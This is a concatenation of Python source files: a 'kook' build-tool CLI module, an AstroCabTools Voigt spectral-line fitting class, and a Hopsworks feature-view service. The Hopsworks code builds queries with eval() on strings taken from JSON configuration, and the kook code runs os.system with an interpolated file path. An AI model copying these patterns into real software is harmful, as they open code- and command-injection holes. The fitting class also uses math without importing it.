if getattr(kook, '_BOOK_CONTENT', None):
cookbook = Cookbook(props).load(kook._BOOK_CONTENT)
else:
cookbook = Cookbook.new(bookname, props)
## list recipes
if opts.get('l') or opts.get('L'):
self._list_recipes(cookbook, opts)
return 0
## get default product if no argument
if not rests:
default_product = cookbook.default_product()
if not default_product:
write = sys.stderr.write
write("*** %s: target is not given\n" % self.command)
write("*** '%s -l' or '%s -L' shows recipes and properties.\n" % (self.command, self.command))
write("*** (or set 'kookbook.default=\"XXX\"' in your kookbook.)\n")
return 1
rests = [default_product]
## start cooking
kitchen = Kitchen.new(cookbook)
kitchen.start_cooking(*rests)
##
return 0
def _list_recipes(self, cookbook, opts):
show_all = opts.get('L')
format = " %-20s: %s\n"
#format2 = " %-18s: %s\n"
format2 = " %-20s %s\n"
write = sys.stdout.write
## properties
write("Properties:\n")
for prop_name, prop_value in cookbook.all_properties():
write(format % (prop_name, repr(prop_value)))
write("\n")
## task and file recipes
def f(title, recipes):
write(title + ":\n")
for recipe in recipes:
if show_all or recipe.desc:
prod_str = recipe.product
if recipe.spices:
optparser = CommandOptionParser(recipe.spices)
if optparser.arg_desc:
prod_str += ' ' + optparser.arg_desc
write(format % (prod_str, recipe.desc or ''))
if config.quiet:
continue
if recipe.spices:
for opt, desc in optparser.helps:
if desc:
write(format2 % (opt, desc))
write("\n")
f("Task recipes", cookbook.specific_task_recipes + cookbook.generic_task_recipes)
f("File recipes", cookbook.specific_file_recipes + cookbook.generic_file_recipes)
## default product
default_product = cookbook.default_product()
if default_product:
write("kookbook.default: %s\n" % default_product)
write("\n")
## tips
if not opts.get('q'):
tip = self.get_tip(default_product)
write("(Tips: %s)\n" % tip)
return 0
def get_tip(self, default_product):
from random import random
index = int(random() * len(TIPS))
assert index < len(TIPS)
if default_product: # if default product is specified,
if index == 0: # escape tip about it.
index = int(random() * len(TIPS)) or 1
else: # if default product is not specified,
if random() < 0.5: # show tip about it frequently.
index = 0
return TIPS[index]
def main(self):
try:
status = self.invoke()
return status
except Exception:
ex = sys.exc_info()[1]
## show command option error
ex_classes = (CommandOptionError, KookCommandError, KookRecipeError) # or (CommandOptionError, KookError)
if isinstance(ex, ex_classes):
if not isinstance(ex, CommandOptionError):
sys.stderr.write("*** ERROR\n")
sys.stderr.write(self.command + ": " + str(ex) + "\n")
## system() failed
if isinstance(ex, KookCommandError):
#sys.stderr.write(self.command + ": " + str(ex) + "\n")
traceback_obj = sys.exc_info()[2]
import traceback
found = False
bookname = config.cookbook_filename
for tupl in reversed(traceback.extract_tb(traceback_obj)):
filename, linenum, func_name, message = tupl
if filename.endswith(bookname):
found = True
break
if found:
sys.stderr.write("%s:%s: %s\n" % (filename, linenum, message))
else:
traceback.print_tb(traceback_obj, file=sys.stderr)
## kick emacsclient when $E defined
if os.environ.get('E'):
import traceback
s = traceback.format_exc()
pat = re.compile(r'^ File "(.*)", line (\d+),', re.M)
tuples = [ (m.group(1), m.group(2)) for m in pat.finditer(s) ]
tuples.reverse()
for filename, linenum in tuples:
if os.access(filename, os.W_OK):
break
else:
filename = linenum = None
if filename and linenum:
kicker_command = "emacsclient -n +%s %s" % (linenum, filename)
os.system(kicker_command)
## re-raise exception when debug mode
if not isinstance(ex, ex_classes) or config.debug_level > 0:
raise
status = 1
return status
class MainApplication(MainObject):
def __init__(self, argv=None):
if argv is None: argv = sys.argv
#shebang_p = len(argv) >= 3 and argv[1] == '-X'
#self.command = shebang_p and os.path.basename(argv[2]) or None
self.command = None
self.args = argv[1:]
optdef_strs = (
"-h: help",
#"--help: help",
#"-V: version",
"-D[N]: debug level (default: 1)",
#"-q: quiet",
#"-f file: kookbook",
"-F: forcedly",
#"-l: list public recipes",
#"-L: list all recipes",
#"-n: not invoke (dry run)",
"-X file:",
"--name=value: property name and value",
"--name: property name and value(=True)",
)
def invoke(self):
quiet = config.quiet
config.quiet = True
try:
self._invoke()
finally:
config.quiet = quiet
def _invoke(self):
## parse command-line options
optparser = CommandOptionParser(self.optdef_strs)
opts, longopts, rests = optparser.parse2(self.args, command=self.command)
#print "*** debug: command option: opts=%s, longopts=%s, rests=%s" % (repr(opts), repr(longopts), repr(rests))
## handle options
bookname = opts.get('X')
if not bookname:
raise CommandOptionError("-X: script filename required.")
self.command = os.path.basename(bookname)
## property file
props = self._load_property_file()
if longopts:
props.update(longopts)
## help
if opts.get('h') or longopts.get('help') is True:
target = rests and rests[0] or None
self._show_help(bookname, props, target=target, optparser=optparser)
return 0
## other options
#if opts.get('V'):
# sys.stdout.write(__RELEASE__ + "\n")
# return 0
#if opts.get('q'): config.quiet = True
if opts.get('F'): config.forced = True
if opts.get('D'):
v = str2int(opts['D']) # notice that int(True) is 1
if v is None:
raise CommandOptionError('-D%s: integer is required.' % opts['D'])
config.debug_level = v
## create cookbook
cookbook = Cookbook.new(bookname, props)
if not rests:
default_product = cookbook.default_product()
if not default_product:
raise CommandOptionError("sub-command is required (try '-h' to show all sub-commands).")
rests = [default_product]
## start cooking
kitchen = Kitchen.new(cookbook)
kitchen.start_cooking(*rests)
##
return 0
def _show_help(self, bookname, props={}, target=None, optparser=None):
cookbook = Cookbook.new(bookname, props)
if target:
self._show_help_for(cookbook, target)
else:
self._show_help_all(cookbook, optparser)
def _show_help_for(self, cookbook, target):
recipes = cookbook.specific_task_recipes
write = sys.stdout.write
lst = [ recipe for recipe in recipes if recipe.product == target ]
if not lst:
raise CommandOptionError("%s: sub command not found." % target)
recipe = lst[0]
write("%s %s - %s\n" % (self.command, recipe.product, recipe.desc or ''))
if recipe.spices:
optparser = CommandOptionParser(recipe.spices)
for opt, desc in optparser.helps:
write(" %-20s : %s\n" % (opt, desc))
def _show_help_all(self, cookbook, optparser):
recipes = cookbook.specific_task_recipes
write = sys.stdout.write
desc = cookbook.context.get('kook_desc') or ''
write("%s - %s\n" % (self.command, desc))
if False:
write("\n")
write("global-options:\n")
write(optparser.help())
write("\n")
write("sub-commands:\n")
for recipe in recipes:
if recipe.desc:
write(" %-15s : %s\n" % (recipe.product, recipe.desc))
write("\n")
write("(Type '%s -h subcommand' to show options of sub-commands.)\n" % self.command)
def main(self):
try:
status = self.invoke()
except CommandOptionError:
ex = sys.exc_info()[1]
if self.command:
sys.stderr.write(self.command + ": " + str(ex) + "\n")
else:
sys.stderr.write(str(ex) + "\n")
status = 1
return status | PypiClean |
/AstroCabTools-1.5.1.tar.gz/AstroCabTools-1.5.1/astrocabtools/fit_line/src/models/voigtModelCreation.py | import numpy as np
import pandas as pd
from lmfit import Parameters, Model
import sys
import traceback
import io
from collections import deque
from .voigtPointsData import voigtPointsData
from .linePointsData import linePointsData
from .quadraticPointsData import quadraticPointsData
from .exponentialPointsData import exponentialPointsData
from .powerLawPointsData import powerLawPointsData
from astrocabtools.fit_line.src.utils.fitting_model_creation import calculate_intercept, calculate_slope, integrated_flux, voigt_fitting_function, line_fitting_function, quadratic_fitting_function, exponential_fitting_function, powerLaw_fitting_function
__all__ = ['voigtModel']
class voigtModel:
def __init__(self, textLines, typeCont, parent=None):
super().__init__()
if typeCont == 'line':
self.__continuumFitPoints = linePointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0)
elif typeCont == 'quadratic':
self.__continuumFitPoints = quadraticPointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0, c2=0.0)
elif typeCont == 'exponential':
self.__continuumFitPoints = exponentialPointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0)
elif typeCont == 'powerLaw':
self.__continuumFitPoints = powerLawPointsData(leftX=0.0, rightX=0.0, leftY=0.0, rightY=0.0)
self.__voigtFitPoints = voigtPointsData(leftX=0.0,rightX=0.0,topX=0.0,sigma1X=0.0,sigma2X=0.0, leftY=0.0,rightY=0.0,topY=0.0,sigma1Y=0.0,sigma2Y=0.0, gamma=0.0)
self.__voigtDict = {}
self.__voigtDeque = deque()
self.__lines = []
self.__markers = []
self.__textLines = textLines
self.__typeCont = typeCont
@property
def lines(self):
return self.__lines
@property
def markers(self):
return self.__markers
@lines.setter
def lines(self, figure):
self.__lines.append(figure)
@markers.setter
def markers(self, marker):
self.__markers.append(marker)
def del_marker(self, marker):
self.__markers.remove(marker)
def del_line(self, line):
self.__lines.remove(line)
def init_data_points(self):
continuumFitDict = self.__continuumFitPoints.asdict()
voigtFitDict = self.__voigtFitPoints.asdict()
"""
Merge two dicts to simplify the use in the iterative process and
in case of duplicate parameters on both
"""
self.__voigtDict = voigtFitDict.update(continuumFitDict) or voigtFitDict
self.__textLines = iter(self.__textLines)
def add_data_points(self, xdata, ydata):
""" Update specific coordinate values based on order value of counter
:param float xdata: X coordinate
:param float ydata: Y coordinate
"""
self.__voigtDeque.append((xdata, ydata))
return self.__textLines
def _generate_initial_voigt_model(self,wavelengthValues, A, c, sigma, gamma):
y_values = []
for x in wavelengthValues:
y_values.append(voigt_fitting_function(x, A, c, sigma, gamma))
return y_values
def draw_model_fit(self, path, wavelength, flux):
""" Generate the voigt model, draw the model results based on x value range
and update the table that shows the results parameters"""
if self.__typeCont == 'quadratic':
self.__voigtDeque.append(1)
self.__voigtDeque.append(1.)
for i, key in enumerate(self.__voigtDict.keys()):
self.__voigtDict[key] = self.__voigtDeque[i]
#Obtain the wavelength values on given range
wavelengthValues = wavelength[(wavelength >= self.__voigtDict['left'][0]) & (wavelength <= self.__voigtDict['right'][0])]
#Obtain de indexes from the initial wavelength array
#based on the min a max values of the slice made previously
index1 = np.where(wavelength == np.amin(wavelengthValues))
index2 = np.where(wavelength == np.amax(wavelengthValues))
#Obtain the flux values between the indexes obtained previously
fluxValues = flux[index1[0][0]:(index2[0][0]+1)]
voigt = Model(voigt_fitting_function, name= 'model1')
c = self.__voigtDict['top'][0]
sigma=abs(self.__voigtDict['sigma2'][1]-self.__voigtDict['sigma1'][1])/3.6013
A = (self.__voigtDict['top'][1] - (self.__voigtDict['left'][1] + self.__voigtDict['right'][1])/2.) *3.6013* sigma
gamma = sigma
initial_y_values = self._generate_initial_voigt_model(wavelengthValues, A, c, sigma, gamma)
if self.__typeCont == 'line':
b = calculate_slope(self.__voigtDict['left'][0], self.__voigtDict['left'][1],self.__voigtDict['right'][0], self.__voigtDict['right'][1])
a=calculate_intercept(b, self.__voigtDict['left'][0], self.__voigtDict['left'][1])
line = Model(line_fitting_function, name='continuum_fitting_function')
voigt_model = voigt + line
params = voigt_model.make_params(A = A,
c = c,
sigma= sigma,
gamma = gamma,
a= a,
b= b)
init = voigt_model.eval(params, x=wavelengthValues)
result = voigt_model.fit(fluxValues, params, x=wavelengthValues, nan_policy='omit')
#Update table of results parameters
resultText = "Path: {}".format(path)
resultText = resultText + "\n" + \
"z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
resultText = resultText + "\n" + \
"Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
resultText = resultText + "\n" + "Line model: {} + {} * x".format(str(result.params['a'].value), str(result.params['b'].value))
resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
for resultParams in voigtFitResultList:
resultText = resultText + "\n" + resultParams
resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
return result, resultText, wavelengthValues, fluxValues, initial_y_values, None
elif self.__typeCont == 'quadratic':
b = calculate_slope(self.__voigtDict['left'][0], self.__voigtDict['left'][1],self.__voigtDict['right'][0], self.__voigtDict['right'][1])
a=calculate_intercept(b, self.__voigtDict['left'][0], self.__voigtDict['left'][1])
c2 = 1.
quadratic = Model(quadratic_fitting_function, name= 'continuum_fitting_function')
voigt_model = voigt + quadratic
params = voigt_model.make_params(A = A,
c = c,
sigma=sigma,
gamma = gamma,
a=a,
b=b,
c2= c2)
init = voigt_model.eval(params, x=wavelengthValues)
result = voigt_model.fit(fluxValues, params, x=wavelengthValues)
#Update table of results parameters
resultText = "Path: {}".format(path)
resultText = resultText + "\n" + \
"z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
resultText = resultText + "\n" + \
"Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
resultText = resultText + "\n" + "Quadratic model: {} + {} * x + {}*x**2".format(str(result.params['a'].value), str(result.params['b'].value), str(result.params['c2'].value))
resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
for resultParams in voigtFitResultList:
resultText = resultText + "\n" + resultParams
resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
return result, resultText, wavelengthValues, fluxValues, initial_y_values, None
elif self.__typeCont == 'exponential':
tau = (self.__voigtDict['right'][0] - self.__voigtDict['left'][0])/np.log(self.__voigtDict['left'][1]/self.__voigtDict['right'][1])
A_exp = self.__voigtDict['left'][1]/math.e**(-self.__voigtDict['left'][0]/tau)
exponential = Model(exponential_fitting_function, name= 'continuum_fitting_function')
voigt_model = voigt + exponential
params = voigt_model.make_params(A = A,
c = c,
sigma=sigma,
gamma=gamma,
A_exp = A_exp,
tau=tau)
init = voigt_model.eval(params, x=wavelengthValues)
result = voigt_model.fit(fluxValues, params, x=wavelengthValues)
#Update table of results parameters
resultText = "Path: {}".format(path)
resultText = resultText + "\n" + \
"z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
resultText = resultText + "\n" + \
"Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
resultText = resultText + "\n" + "Exponential model: {} * e**(-x /{})".format(str(result.params['A_exp'].value), str(result.params['tau'].value))
resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
for resultParams in voigtFitResultList:
resultText = resultText + "\n" + resultParams
resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
return result, resultText, wavelengthValues, fluxValues, initial_y_values, None
elif self.__typeCont == 'powerLaw':
k = math.log10(self.__voigtDict['left'][1]/self.__voigtDict['right'][1])/math.log10(self.__voigtDict['left'][0]/self.__voigtDict['right'][0])
A_pow = self.__voigtDict['left'][1]/(self.__voigtDict['left'][0]**k)
powerLaw = Model(powerLaw_fitting_function, name= 'continuum_fitting_function')
voigt_model = voigt + powerLaw
params = voigt_model.make_params(A = A,
c = c,
sigma=sigma,
gamma = gamma,
A_pow=A_pow,
k=k)
init = voigt_model.eval(params, x=wavelengthValues)
result = voigt_model.fit(fluxValues, params, x=wavelengthValues)
#Update table of results parameters
resultText = "Path: {}".format(path)
resultText = resultText + "\n" + \
"z: (x - {} + i*{})/(sigma * sqrt(2)".format(str(result.params['c'].value), str(result.params['gamma'].value))
resultText = resultText + "\n" + \
"Voigt model: ({} * Re[e**(-z**2)*erfc(-i*z)])/({} * sqrt(2*pi))".format(str(result.params['A'].value), str(result.params['sigma'].value))
resultText = resultText + "\n" + "Power law model: {} * x**{}".format(str(result.params['A_pow'].value), str(result.params['k'].value))
resultText = resultText + "\n" + "Voigt integrated flux : "+ " = " + str(integrated_flux(result.params['A'].value, result.params['sigma'].value, 'voigt'))
voigtFitResultList = [key + " = " + str(result.params[key].value) for key in result.params]
for resultParams in voigtFitResultList:
resultText = resultText + "\n" + resultParams
resultText = resultText + "\n" + "Chi-square" + " = " + str(result.chisqr)
return result, resultText, wavelengthValues, fluxValues, initial_y_values, None | PypiClean |
/Hopsworks_Integration-0.0.2-py3-none-any.whl/src/service/ComplexFeatureService.py | import hsfs.constructor.query
import logging
import pandas as pd
from hsfs.feature import Feature
import json
import sys
import os
parent_dir = os.path.dirname(os.getcwd())
sys.path.insert(0,parent_dir)
from src.service import FeatureStoreService as fss
from src.utils import multi_melt as melt
logger = logging.getLogger('logger')
class ComplexFeatureService:
def __init__(self, config):
self.conf = config
with open(self.conf, "r") as jsonfile:
data = json.load(jsonfile)
def build_view_team(self):
try:
logger.info('Getting feature groups details')
features_game_base = ["uuid", "League", "Date", "Team1", "Team2", "Season", "G_Type", "T1_loc", "T2_loc",
"T1_sea_g_played", "T1_sea_g_played_h", "T1_sea_g_played_a", "T2_sea_g_played",
"T2_sea_g_played_h", "T2_sea_g_played_a", "T1_B2B", "T2_B2B"]
features_box_score = ["T1_pts", "T2_pts", "T1_Result", "T2_Result", "Box_Type", "MP", "T1_FGM", "T1_FGA",
"T1_FG_Pct", "T1_2PM", "T1_2PA", "T1_2P_Pct", "T1_3PM", "T1_3PA", "T1_3P_Pct",
"T1_FTM", "T1_FTA", "T1_FT_Pct", "T1_OREB", "T1_DREB", "T1_REB", "T1_AST", "T1_TOV",
"T1_STL", "T1_BLK", "T1_PF", "T2_FGM", "T2_FGA", "T2_FG_Pct", "T2_2PM", "T2_2PA",
"T2_2P_Pct", "T2_3PM", "T2_3PA", "T2_3P_Pct", "T2_FTM", "T2_FTA", "T2_FT_Pct",
"T2_OREB", "T2_DREB", "T2_REB", "T2_AST", "T2_TOV", "T2_STL", "T2_BLK", "T2_PF",
"PD_Box", "PT_Box"]
features_adv_stats = ["T1_Poss_Cnt", "T1_Poss_Sec", "T1_Poss_Sdp", "Box_Type", "T1_FGA_Poss_Prop",
"T1_2PA_Poss_Prop", "T1_3PA_Poss_Prop", "T1_FTA_Poss_Prop", "T1_FTA_FGA_Rto",
"T1_EFG_Pct", "T1_TS_Pct", "T1_OREB_REB_Pct", "T1_DREB_REB_Pct", "T1_TOV_Poss_Pct",
"T1_PF_Poss_Pct", "T2_Poss_Cnt", "T2_Poss_Sec", "T2_Poss_Sdp", "T2_FGA_Poss_Prop",
"T2_2PA_Poss_Prop", "T2_3PA_Poss_Prop", "T2_FTA_Poss_Prop", "T2_FTA_FGA_Rto",
"T2_EFG_Pct", "T2_TS_Pct", "T2_OREB_REB_Pct", "T2_DREB_REB_Pct", "T2_TOV_Poss_Pct",
"T2_PF_Poss_Pct", "PD_Poss", "PT_Poss"]
fss_obj = fss.FeatureStoreService(self.conf)
fg_game_base = fss_obj.get_group(
"gp_game_base",
2
)
fg_box_score = fss_obj.get_group(
"gp_box_score",
1
)
fg_adv_stats = fss_obj.get_group(
"gp_adv_stats",
1
)
df = fg_box_score.select(features_box_score).filter(Feature('uuid') == 6568) \
.join(fg_adv_stats.select(features_adv_stats).filter(Feature('uuid') == 6568), \
on=['uuid', 'box_type'], join_type='inner') \
.join(fg_game_base.select(features_game_base).filter(Feature('uuid') == 6568), \
on=['uuid'], join_type='inner') \
.read()
df['t1_pd_box'] = df['t2_pts'] - df['t1_pts']
df['t2_pd_box'] = df['t1_pts'] - df['t2_pts']
df['t1_pd_poss'] = (df['t2_pts'] - df['t1_pts']) / (df[['t1_poss_cnt', 't2_poss_cnt']].mean(axis=1))
df['t2_pd_poss'] = (df['t1_pts'] - df['t2_pts']) / (df[['t1_poss_cnt', 't2_poss_cnt']].mean(axis=1))
id_vars = ['uuid', 'date', 'season', 'box_type', 'g_type', 'mp', 'pt_box', 'pt_poss']
value_vars = [['Team1', 'Team2'], ['T1_Loc', 'T2_Loc'], ['T1_sea_g_played', 'T2_sea_g_played'],
['T1_B2B', 'T2_B2B'], ['t1_pd_box', 't2_pd_box'], ['t1_pd_poss', 't2_pd_poss'],
['T1_PTS', 'T2_PTS'], ['T1_FGM', 'T2_FGM'], ['T1_FGA', 'T2_FGA'],
['T1_FG_Pct', 'T2_FG_Pct'], ['T1_2PM', 'T2_2PM'], ['T1_2PA', 'T2_2PA'],
['T1_2P_Pct', 'T2_2P_Pct'],
['T1_3PM', 'T2_3PM'], ['T1_3PA', 'T2_3PA'], ['T1_3P_Pct', 'T2_3P_Pct'], ['T1_FTM', 'T2_FTM'],
['T1_FTA', 'T2_FTA'], ['T1_FT_Pct', 'T2_FT_Pct'], ['T1_OREB', 'T2_OREB'],
['T1_DREB', 'T2_DREB'],
['T1_REB', 'T2_REB'], ['T1_AST', 'T2_AST'], ['T1_TOV', 'T2_TOV'], ['T1_STL', 'T2_STL'],
['T1_BLK', 'T2_BLK'],
['T1_PF', 'T2_PF'], ['T2_PTS', 'T1_PTS'], ['T2_FGM', 'T1_FGM'], ['T2_FGA', 'T1_FGA'],
['T2_FG_Pct', 'T1_FG_Pct'], ['T2_2PM', 'T1_2PM'], ['T2_2PA', 'T1_2PA'],
['T2_2P_Pct', 'T1_2P_Pct'],
['T2_3PM', 'T1_3PM'], ['T2_3PA', 'T1_3PA'], ['T2_3P_Pct', 'T1_3P_Pct'], ['T2_FTM', 'T1_FTM'],
['T2_FTA', 'T1_FTA'], ['T2_FT_Pct', 'T1_FT_Pct'], ['T2_OREB', 'T1_OREB'],
['T2_DREB', 'T1_DREB'],
['T2_REB', 'T1_REB'], ['T2_AST', 'T1_AST'], ['T2_TOV', 'T1_TOV'], ['T2_STL', 'T1_STL'],
['T2_BLK', 'T1_BLK'],
['T2_PF', 'T1_PF'], ['T1_Poss_Cnt', 'T2_Poss_Cnt'], ['T1_Poss_Sec', 'T2_Poss_Sec'],
['T1_Poss_Sdp', 'T2_Poss_Sdp'], ['T1_FGA_Poss_Prop', 'T2_FGA_Poss_Prop'],
['T1_2PA_Poss_Prop', 'T2_2PA_Poss_Prop'], ['T1_3PA_Poss_Prop', 'T2_3PA_Poss_Prop'],
['T1_FTA_Poss_Prop', 'T2_FTA_Poss_Prop'], ['T1_FTA_FGA_Rto', 'T2_FTA_FGA_Rto'],
['T1_EFG_Pct', 'T2_EFG_Pct'],
['T1_TS_Pct', 'T2_TS_Pct'], ['T1_OREB_REB_Pct', 'T2_OREB_REB_Pct'],
['T1_DREB_REB_Pct', 'T2_DREB_REB_Pct'],
['T1_TOV_Poss_Pct', 'T2_TOV_Poss_Pct'], ['T1_PF_Poss_Pct', 'T2_PF_Poss_Pct'],
['T2_Poss_Cnt', 'T1_Poss_Cnt'],
['T2_Poss_Sec', 'T1_Poss_Sec'], ['T2_Poss_Sdp', 'T1_Poss_Sdp'],
['T2_FGA_Poss_Prop', 'T1_FGA_Poss_Prop'],
['T2_2PA_Poss_Prop', 'T1_2PA_Poss_Prop'], ['T2_3PA_Poss_Prop', 'T1_3PA_Poss_Prop'],
['T2_FTA_Poss_Prop', 'T1_FTA_Poss_Prop'], ['T2_FTA_FGA_Rto', 'T1_FTA_FGA_Rto'],
['T2_EFG_Pct', 'T1_EFG_Pct'],
['T2_TS_Pct', 'T1_TS_Pct'], ['T2_OREB_REB_Pct', 'T1_OREB_REB_Pct'],
['T2_DREB_REB_Pct', 'T1_DREB_REB_Pct'],
['T2_TOV_Poss_Pct', 'T1_TOV_Poss_Pct'], ['T2_PF_Poss_Pct', 'T1_PF_Poss_Pct']]
value_name = ['Team', 'Team_Loc', 'Team_sea_g_played', 'Team_B2B', 'PD_Box', 'PD_Poss', 'Off_PTS',
'Off_FGM',
'Off_FGA', 'Off_FG_Pct', 'Off_2PM', 'Off_2PA', 'Off_2P_Pct', 'Off_3PM', 'Off_3PA',
'Off_3P_Pct',
'Off_FTM', 'Off_FTA', 'Off_FT_Pct', 'Off_OREB', 'Off_DREB', 'Off_REB', 'Off_AST', 'Off_TOV',
'Off_STL', 'Off_BLK', 'Off_PF', 'Def_PTS', 'Def_FGM',
'Def_FGA', 'Def_FG_Pct', 'Def_2PM', 'Def_2PA', 'Def_2P_Pct', 'Def_3PM', 'Def_3PA',
'Def_3P_Pct',
'Def_FTM', 'Def_FTA', 'Def_FT_Pct', 'Def_OREB', 'Def_DREB', 'Def_REB', 'Def_AST', 'Def_TOV',
'Def_STL', 'Def_BLK', 'Def_PF', 'Off_Poss_Cnt', 'Off_Poss_Sec', 'Off_Poss_Sdp',
'Off_FGA_Poss_Prop',
'Off_2PA_Poss_Prop', 'Off_3PA_Poss_Prop', 'Off_FTA_Poss_Prop', 'Off_FTA_FGA_Rto',
'Off_EFG_Pct',
'Off_TS_Pct', 'Off_OREB_REB_Pct', 'Off_DREB_REB_Pct', 'Off_TOV_Poss_Pct', 'Off_PF_Poss_Pct',
'Def_Poss_Cnt', 'Def_Poss_Sec', 'Def_Poss_Sdp', 'Def_FGA_Poss_Prop', 'Def_2PA_Poss_Prop',
'Def_3PA_Poss_Prop', 'Def_FTA_Poss_Prop', 'Def_FTA_FGA_Rto', 'Def_EFG_Pct', 'Def_TS_Pct',
'Def_OREB_REB_Pct', 'Def_DREB_REB_Pct', 'Def_TOV_Poss_Pct', 'Def_PF_Poss_Pct']
test = [[x.lower() for x in sub_value_vars] for sub_value_vars in value_vars]
df_melted = melt.call_multi_melt(df,
[x.lower() for x in id_vars],
[[x.lower() for x in sub_value_vars] for sub_value_vars in value_vars],
[x.lower() for x in value_name]).drop(columns=['variable'])
pd.set_option('display.max_columns', None)
pd.set_option('display.width', 1000)
final_df = df_melted[
['uuid', 'date', 'season', 'g_type', 'team', 'team_loc', 'team_sea_g_played', 'team_b2b', 'mp',
'box_type', 'pd_box', 'pt_box', 'off_pts', 'off_fgm', 'off_fga', 'off_fg_pct', 'off_2pm', 'off_2pa',
'off_2p_pct', 'off_3pm', 'off_3pa', 'off_3p_pct', 'off_ftm', 'off_fta', 'off_ft_pct', 'off_oreb',
'off_dreb', 'off_reb', 'off_ast', 'off_tov', 'off_stl', 'off_blk', 'off_pf', 'def_pts', 'def_fgm',
'def_fga', 'def_fg_pct', 'def_2pm', 'def_2pa', 'def_2p_pct', 'def_3pm', 'def_3pa', 'def_3p_pct',
'def_ftm', 'def_fta', 'def_ft_pct', 'def_oreb', 'def_dreb', 'def_reb', 'def_ast', 'def_tov',
'def_stl', 'def_blk', 'def_pf', 'pd_poss', 'pt_poss', 'off_poss_cnt', 'off_poss_sec', 'off_poss_sdp',
'off_fga_poss_prop', 'off_2pa_poss_prop', 'off_3pa_poss_prop', 'off_fta_poss_prop',
'off_fta_fga_rto', 'off_efg_pct', 'off_ts_pct', 'off_oreb_reb_pct', 'off_dreb_reb_pct',
'off_tov_poss_pct', 'off_pf_poss_pct', 'def_poss_cnt', 'def_poss_sec', 'def_poss_sdp',
'def_fga_poss_prop', 'def_2pa_poss_prop', 'def_3pa_poss_prop', 'def_fta_poss_prop',
'def_fta_fga_rto', 'def_efg_pct', 'def_ts_pct', 'def_oreb_reb_pct', 'def_dreb_reb_pct',
'def_tov_poss_pct', 'def_pf_poss_pct']]
final_df.sort_values(by=['uuid', 'box_type'], inplace=True)
filtered_df = final_df[['uuid', 'team', 'box_type', 'pd_box', 'pt_box', 'pd_poss', 'pt_poss']]
print(filtered_df)
fss_obj.build_group('temp_group',
1,
"temporary feature group",
['uuid', 'date', 'season', 'box_type', 'team'],
[],
final_df.columns.tolist(),
final_df)
fg_temp = fss_obj.get_group('temp_group', 1)
query = fg_temp.select_all()
fss_obj.drop_group('temp_group', 1)
return query
except Exception as e:
logger.error(e)
finally:
pass
def build_view_t1vst2(self, view_name, view_version, description, view_json):
try:
logger.info('Getting feature groups details')
query = hsfs.constructor.query.Query
for groups in view_json:
name = groups["name"]
version = groups["version"]
features = groups["features"]
join_sequence = groups["join_sequence"]
joining_columns = groups["joining_columns"]
join_type = groups["join_type"]
fss_obj = fss.FeatureStoreService(self.conf)
fg_name = fss_obj.get_group(
name,
version
)
filters = ""
if join_sequence == 1:
if groups["filters"] is not str.strip(""):
filters = ".filter(" + groups["filters"] + ")"
q = "fg_name.select([" + "'{}'".format("','".join(features)) + "])" + filters
query = eval(q)
else:
if groups["filters"] is not str.strip(""):
filters = ".filter(" + groups["filters"] + ")"
q = "query.join(fg_name.select([" + "'{}'".format(
"','".join(features)) + "])" + filters + ",on=[" + "'{}'".format(
"','".join(joining_columns)) + "],join_type='" + join_type + "')"
query = eval(q)
str_query = query.to_string()
return query
except Exception as e:
logger.error(e)
finally:
pass
def build_view_league(self, main_feature_group, secondary_feature_groups, view_name, view_version, labels,
description):
try:
logger.info('Getting feature groups details')
fss_obj = fss.FeatureStoreService(self.conf)
main_feature_group_handle = fss_obj.get_group(main_feature_group["name"], main_feature_group["version"])
if len(main_feature_group["filters"]) > 0:
main_feature_group_handle = main_feature_group_handle.filter(eval(main_feature_group["filters"]))
query = "main_feature_group_handle.select(main_feature_group['features'])"
for group in secondary_feature_groups:
name = group["name"]
version = group["version"]
secondary_feature_group_handle = fss_obj.get_group(name, version)
if len(group["filters"]) > 0:
secondary_feature_group_handle = secondary_feature_group_handle.filter(eval(group["filters"]))
query = query + ".join(secondary_feature_group_handle.select(group['features']), \
on=main_feature_group['joining_column']==group['joining_column'], \
join_type=group['join_type'])"
query_string = eval(query)
fss_obj.build_view(view_name, view_version, description, "", query_string)
except Exception as e:
logger.error(e)
finally:
pass
def build_view(self, view_name, view_version, description, view_json):
try:
cfs_obj = ComplexFeatureService(self.conf)
if (view_name == 'team'):
##TODO: Implement logic for team view
pass
# query = cfs_obj.build_view_team()
# fss_obj = fss.FeatureStoreService(self.conf)
# fss_obj.build_view(view_name, view_version, description, "", query)
elif (view_name == 'league'):
##TODO: Implement logic for league view
pass
# query = cfs_obj.build_view_league(view_name, view_version, description, view_json)
# fss_obj = fss.FeatureStoreService(self.conf)
# fss_obj.build_view(view_name, view_version, description, "", query)
elif (view_name == 't1vst2'):
query = cfs_obj.build_view_t1vst2(view_name, view_version, description, view_json)
fss_obj = fss.FeatureStoreService(self.conf)
fss_obj.build_view(view_name, view_version, description, "", query)
else:
